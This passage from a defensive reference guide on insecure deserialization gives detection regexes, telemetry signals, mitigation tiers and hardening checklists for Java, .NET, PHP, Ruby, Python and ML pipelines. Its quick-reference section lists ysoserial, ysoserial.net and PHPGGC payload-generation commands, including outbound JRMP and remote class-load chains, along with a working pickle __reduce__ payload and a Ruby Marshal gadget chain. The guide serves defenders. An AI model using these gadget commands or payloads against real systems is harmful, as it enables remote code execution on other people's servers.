pattern: YAML.load(...)             # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...)               # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder

# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)
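As a rough illustration of how such signatures can be run before a proper Semgrep or CodeQL setup exists, here is a small line-based scanner in Python. The regular expressions are simplified assumptions derived from a few of the patterns above, the `SIGNATURES` table and `scan` function are hypothetical, and a line-oriented regex will miss multi-line calls and aliased imports.

```python
import re

# Simplified regexes for a handful of the signatures listed above.
SIGNATURES = {
    "python": [
        r"\bpickle\.loads?\(",
        r"\byaml\.load\((?![^)]*SafeLoader)",
        r"\btorch\.load\((?![^)]*weights_only\s*=\s*True)",
    ],
    "java": [
        r"new\s+ObjectInputStream\(",
        r"new\s+XMLDecoder\(",
        r"\.enableDefaultTyping\(",
    ],
    "php": [r"\bunserialize\(\s*\$_(GET|POST|COOKIE|REQUEST)"],
    "ruby": [r"\bMarshal\.load\(", r"\bYAML\.unsafe_load\("],
}


def scan(source: str, language: str) -> list[tuple[int, str]]:
    """Return (line number, stripped line) for each line matching a signature."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern in SIGNATURES.get(language, []):
            if re.search(pattern, line):
                hits.append((lineno, line.strip()))
                break  # one hit per line is enough for triage
    return hits


sample = (
    "import pickle\n"
    "obj = pickle.loads(blob)\n"
    "cfg = yaml.load(text, Loader=yaml.SafeLoader)\n"
    "raw = yaml.load(text)\n"
)
hits = scan(sample, "python")
```

Hits are review candidates, not findings: whether the argument is attacker-controlled still has to be established by taint analysis or by reading the code.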

Runtime telemetry signals

Java ClassNotFoundException bursts during deserialization — attacker probing which gadget classes exist.
Outbound DNS lookups correlated with request handlers — URLDNS probe pattern.
JRMP/LDAP outbound from app servers — JNDI gadget signal.
Process spawn by application JVM/CLR/PHP/Python workers — deserialization RCE footprint.
Unusual child processes under w3wp.exe — ViewState RCE.
Memory/CPU spikes with deep object graphs — DoS attempts.
readObject stack frames in production stack traces — inventory for review.
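The process-spawn signals above reduce to a parent/child rule over process-creation events. A minimal sketch, assuming events arrive as (parent, child) image-name pairs from whatever EDR or audit source is in use; the process lists and the `is_suspicious_spawn` helper are illustrative assumptions, not a complete rule set.

```python
# Illustrative lists; real deployments would tune these to their own stack.
WORKER_PROCESSES = {"w3wp.exe", "java", "java.exe", "php-fpm", "python", "python3"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe",
                       "sh", "bash", "curl", "wget"}


def is_suspicious_spawn(parent: str, child: str) -> bool:
    """Flag shells and download tools started by an application worker."""
    return parent.lower() in WORKER_PROCESSES and child.lower() in SUSPICIOUS_CHILDREN


events = [
    ("w3wp.exe", "powershell.exe"),   # ViewState-style RCE footprint
    ("explorer.exe", "cmd.exe"),      # interactive user, not a worker
    ("java", "sh"),                   # JVM spawning a shell
    ("w3wp.exe", "csc.exe"),          # compiler, not on the suspicious list here
]
alerts = [event for event in events if is_suspicious_spawn(*event)]
```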

Log-based detection

Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.
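A spike detector for these exception names can be very small. The following sketch counts matches in one window of log lines and compares the total against a baseline; the `baseline_per_window` and `factor` thresholds are arbitrary placeholders, and `exception_counts` and `is_spike` are hypothetical helper names.

```python
import re
from collections import Counter

DESER_EXCEPTIONS = re.compile(
    r"ClassCastException|InvalidClassException|StreamCorruptedException"
    r"|ClassNotFoundException|UnpicklingError"
)


def exception_counts(log_lines) -> Counter:
    """Count deserialization-related exception names in one window of logs."""
    counts = Counter()
    for line in log_lines:
        match = DESER_EXCEPTIONS.search(line)
        if match:
            counts[match.group(0)] += 1
    return counts


def is_spike(counts: Counter, baseline_per_window: int = 2, factor: int = 5) -> bool:
    """Flag windows whose total exceeds the baseline by the given factor."""
    return sum(counts.values()) >= baseline_per_window * factor


window = ["INFO request handled"] + [
    "ERROR java.lang.ClassCastException: LazyMap cannot be cast to Session"
] * 10
counts = exception_counts(window)
spike = is_spike(counts)
```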

14. Prevention & Mitigation

The hierarchy of fixes (strongest first)

1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”

2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key, and verify the signature before invoking any deserialization. This does not make deserialization safe; it only ensures the bytes came from your own code. Rails’ ActiveSupport::MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: a leaked key (ASP.NET machine key, Rails secret_key_base) turns forging a valid payload from a hard problem into a trivial one, as ViewState exploits repeatedly demonstrate.

3. Apply type allowlists at the deserializer.

Java: ObjectInputFilter.Config.setSerialFilter(...) globally, or per-stream via ois.setObjectInputFilter(...) on the ObjectInputStream (JEP 290). Allowlist expected classes only.
.NET: abandon BinaryFormatter. If unavoidable, a SerializationBinder restricting types is the documented mitigation — but Microsoft explicitly says this cannot be made secure.
Python: subclass pickle.Unpickler, override find_class(module, name) to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies.
Ruby: wrap Marshal.load — no built-in filter exists. Trail of Bits recommends adding Marshal.safe_load upstream.
PHP: unserialize($data, ['allowed_classes' => ['ExpectedClass']]) (PHP 7.0+) restricts instantiation but does not prevent __wakeup/__destruct on allowed classes from being abused.

4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:

No network egress to metadata services or internal endpoints
Read-only filesystem where possible
Minimal privileges (non-root, no cloud credentials via IMDS)
Resource limits to bound DoS blast radius

5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.
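The first two tiers combine naturally: verify integrity first, then parse a data-only format into a fixed type. A minimal sketch under stated assumptions: the key is a placeholder that would come from a secret store, `SessionState`, `seal`, and `open_sealed` are hypothetical names, and the `tag.body` framing is an ad hoc choice for the example rather than a standard format.

```python
import hashlib
import hmac
import json
from dataclasses import dataclass

# Placeholder key for illustration; a real key would come from a secret store.
SECRET_KEY = b"example-key-not-for-production"


@dataclass(frozen=True)
class SessionState:
    user_id: int
    role: str


def seal(state: SessionState) -> bytes:
    """Serialize to JSON and prepend an HMAC-SHA256 tag."""
    body = json.dumps({"user_id": state.user_id, "role": state.role}).encode("utf-8")
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode("ascii")
    return tag + b"." + body


def open_sealed(blob: bytes) -> SessionState:
    """Verify the tag first, then parse into a fixed type with explicit fields."""
    tag, separator, body = blob.partition(b".")
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode("ascii")
    if not separator or not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to parse")
    data = json.loads(body)
    if not isinstance(data, dict) or set(data) != {"user_id", "role"}:
        raise ValueError("unexpected fields")
    if type(data["user_id"]) is not int or type(data["role"]) is not str:
        raise ValueError("unexpected field types")
    return SessionState(user_id=data["user_id"], role=data["role"])


blob = seal(SessionState(user_id=7, role="viewer"))
restored = open_sealed(blob)

try:
    open_sealed(blob.replace(b"viewer", b"admin"))  # tampered body, stale tag
    tamper_rejected = False
except ValueError:
    tamper_rejected = True
```

The same verify-then-parse ordering applies when the body is a native format, with the caveat from tier 2: a valid signature only proves origin, so a leaked key still hands the attacker the deserializer.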

Format-specific migration targets

From	To
Java `ObjectInputStream`	JSON (Jackson with fixed types, no default typing) or Protobuf
PHP `unserialize`	`json_encode` / `json_decode` with explicit fields
Python `pickle` for models	Safetensors for tensors, ONNX for graphs, JSON for metadata
Python `pickle` for IPC	JSON, MessagePack, Protobuf
Ruby `Marshal`	JSON with typed columns, MessagePack, Protobuf
.NET `BinaryFormatter`	`System.Text.Json` or DataContractSerializer with known types
ASP.NET ViewState	Stateless pages, signed tokens, server-side session
YAML with types	`safe_load` / `SafeConstructor`; never `yaml.load` without a safe `Loader` (PyYAML pre-5.1 defaulted to the unsafe loader) or `Yaml().load` (SnakeYAML <2.0)

ML pipeline hardening checklist

Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:

Migrate model weights to safetensors wherever possible. Hugging Face transformers has supported the format since 2022 and now saves to it by default.
Set torch.load(..., weights_only=True) on every load site. torch.load without this is a code review finding.
Never call joblib.load on user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted.
Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf. recv_pyobj() is the anti-pattern.
Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations — LightLLM’s empty-string nonce is the cautionary tale.
Scan model uploads with ModelScan + Fickling, knowing both have bypasses.
Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
Log every model load path. Alert on loads from unexpected origins.
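The "verify before load" and "alert on unexpected origins" items can be combined into one gate in front of the real loader. The sketch below uses a pinned SHA-256 digest as a simpler stand-in for a full signature scheme; `check_model`, `sha256_of`, and the pin table are hypothetical, and a production setup would keep the pins (or signing key) outside the model storage.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream the file so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_model(path: Path, trusted_dir: Path, pinned_digests: dict[str, str]) -> Path:
    """Return the resolved path only if its origin and digest are both expected."""
    resolved = path.resolve()
    if trusted_dir.resolve() not in resolved.parents:
        raise PermissionError(f"{resolved} is outside {trusted_dir}")
    expected = pinned_digests.get(resolved.name)
    if expected is None or sha256_of(resolved) != expected:
        raise ValueError(f"{resolved.name} does not match a pinned digest")
    return resolved  # only now hand the path to the actual loader


with tempfile.TemporaryDirectory() as tmp:
    model_dir = Path(tmp)
    artifact = model_dir / "model.safetensors"
    artifact.write_bytes(b"weights")
    pins = {"model.safetensors": sha256_of(artifact)}

    accepted = check_model(artifact, model_dir, pins) == artifact.resolve()

    artifact.write_bytes(b"tampered")  # simulate a swapped artifact
    try:
        check_model(artifact, model_dir, pins)
        rejected = False
    except ValueError:
        rejected = True
```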

.NET / SharePoint hardening checklist (post-ToolShell)

Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
Restrict ViewState to MAC-validated, encrypted mode.
Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
Inventory BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter usages and plan retirement.
Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
Monitor w3wp.exe spawning cmd.exe, powershell.exe, certutil.exe.

Java hardening checklist

Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
Inventory and upgrade: commons-collections (>=3.2.2 removed unsafe functors; >=4.1 for 4.x), commons-beanutils (>=1.9.4), jackson-databind (latest), xstream (>=1.4.20), snakeyaml (>=2.0), log4j (>=2.17.1).
Remove Jackson default typing. Never call enableDefaultTyping() or set @JsonTypeInfo(use = Id.CLASS) on untrusted input.
Disable RMI registry exposure. Do not publish JMX on untrusted networks.
Retire XMLDecoder for untrusted input entirely.
Audit any custom readObject, readResolve, readExternal methods in your own code.
Set up outbound firewall rules from JVM processes — block unexpected JRMP/LDAP traffic.

PHP hardening checklist

Replace all unserialize($untrusted) with json_decode($untrusted) where possible.
Where replacement is infeasible, use unserialize($data, ['allowed_classes' => false]) or a tight allowlist.
Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
Audit all file operations for phar:// reachability from user input.
Store session data using a non-serializing handler or sign cookies.
Disable unserialize_callback_func.
Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.

Ruby hardening checklist

Replace Marshal.load(untrusted) with JSON with explicit schema.
Migrate Rails cache store off :marshal (Rails 7.1+ defaults to :json for some stores; verify).
Upgrade Ruby to 3.1+ for YAML.load safe default.
Disable JSON.parse(create_additions: true) and Oj.load default mode.
Run Trail of Bits’s Semgrep rules in CI: marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization.
Audit any custom marshal_load / marshal_dump methods.

15. Signature & Gadget Quick Reference

Magic bytes / payload prefixes

Java serialized (raw):        AC ED 00 05
Java serialized (base64):     rO0AB
.NET BinaryFormatter:         00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64):   AAEAAAD/////AQAAAA
Python pickle (proto 2):      80 02
Python pickle (proto 4):      80 04
Python pickle (proto 5):      80 05
Ruby Marshal:                 04 08
PHP serialized object:        O:<digit>+:"
PHP serialized array:         a:<digit>+:{
ASP.NET ViewState prefix:     /wEP / /wEX / /wET
PHAR stub:                    <?php __HALT_COMPILER();
SnakeYAML tag prefix:         !!javax. / !!org. / !!java.
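These prefixes translate directly into a request-body fingerprinting check of the kind a WAF rule or logging middleware might apply. The sketch below covers a subset of the table; `fingerprint` and the label strings are hypothetical, and short prefixes such as the two-byte Ruby Marshal header will produce false positives on arbitrary binary data.

```python
import base64
import pickle
import re

RAW_PREFIXES = [
    (b"\xac\xed\x00\x05", "java-serialized"),
    (b"\x00\x01\x00\x00\x00\xff\xff\xff\xff", "dotnet-binaryformatter"),
    (b"\x04\x08", "ruby-marshal"),
]
TEXT_PREFIXES = [
    ("rO0AB", "java-serialized (base64)"),
    ("AAEAAAD/////", "dotnet-binaryformatter (base64)"),
    ("/wEP", "aspnet-viewstate"),
]
PICKLE_PROTO = re.compile(rb"^\x80[\x02-\x05]")
PHP_OBJECT = re.compile(rb'^O:\d+:"')


def fingerprint(body: bytes):
    """Return a label for a recognized serialization prefix, else None."""
    for prefix, label in RAW_PREFIXES:
        if body.startswith(prefix):
            return label
    if PICKLE_PROTO.match(body):
        return "python-pickle"
    if PHP_OBJECT.match(body):
        return "php-serialized-object"
    text = body[:16].decode("ascii", errors="ignore")
    for prefix, label in TEXT_PREFIXES:
        if text.startswith(prefix):
            return label
    return None


java_b64 = fingerprint(base64.b64encode(b"\xac\xed\x00\x05sr"))
php_object = fingerprint(b'O:8:"stdClass":0:{}')
pickled = fingerprint(pickle.dumps([1], protocol=4))
plain_json = fingerprint(b'{"a": 1}')
```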

Java ysoserial chain selector

ysoserial CommonsCollections1 "cmd"   # JDK < 8u71 + commons-collections 3.x (≤ 3.2.1)
ysoserial CommonsCollections5 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd"     # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd"               # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd"            # hibernate 3.x
ysoserial Jdk7u21 "cmd"               # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "host:port"      # outbound JRMP to an attacker-controlled listener
ysoserial URLDNS "http://probe.dns/"  # blind probe, no RCE
ysoserial Spring1 "cmd"               # older spring-core
ysoserial ROME "cmd"                  # rome 1.0
ysoserial MozillaRhino1 "cmd"         # mozilla rhino
ysoserial Click1 "cmd"                # click framework
ysoserial Clojure "cmd"               # clojure 1.x
ysoserial C3P0 "http://host/:Exploit" # c3p0 remote class load; argument is <base_url>:<classname>

.NET ysoserial.net gadgets

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"

PHPGGC chain selector

phpggc -l laravel       # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id   # base64 URL-encoded
phpggc -p zip -o payload.phar Monolog/RCE1 system id

Python pickle one-liner test

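import os
import pickle

class P:
    # __reduce__ tells pickle which callable to invoke at load time, and with which arguments
    def __reduce__(self):
        return (os.system, ("id",))

# Building the payload is harmless; calling pickle.loads(payload) would run `id`.
payload = pickle.dumps(P())
# Defensive validation only: load this solely inside an isolated test harness, never on production systems.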

Ruby Marshal gadget family (current canonical)

Gem::SpecFetcher
 └─ Gem::Version
     └─ Gem::RequestSet::Lockfile
         └─ Gem::RequestSet
             └─ Gem::Resolver::SpecSpecification
                 └─ Gem::Resolver::GitSpecification
                     └─ Gem::Source::Git
                         └─ git clone with backtick-injected reference
                             └─ shell metacharacter expansion → RCE

Magic method hooks by language

Language	Hooks fired during / after deserialization
Java	`readObject`, `readResolve`, `readObjectNoData`, `readExternal`, `validateObject`, custom `finalize`
PHP	`__wakeup`, `__unserialize`, `__destruct`, `__toString`, `__call`, `__invoke`, `__get`, `__set`
Python (pickle)	`__reduce__` / `__reduce_ex__` (called when pickling, but they choose the callable that runs on load), `__setstate__`, `__new__` (via `NEWOBJ`)
.NET	`[OnDeserializing]`, `[OnDeserialized]`, `ISerializable` serialization constructor taking `(SerializationInfo, StreamingContext)`, `IDeserializationCallback.OnDeserialization`
Ruby (Marshal)	`marshal_load`, `_load`, `init_with` (YAML)
Node.js	`toJSON`, any property getters triggered during reconstruction, `eval`-based schemes via `Function` strings

Universal defensive rule of thumb

If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.

Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, Trail of Bits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.
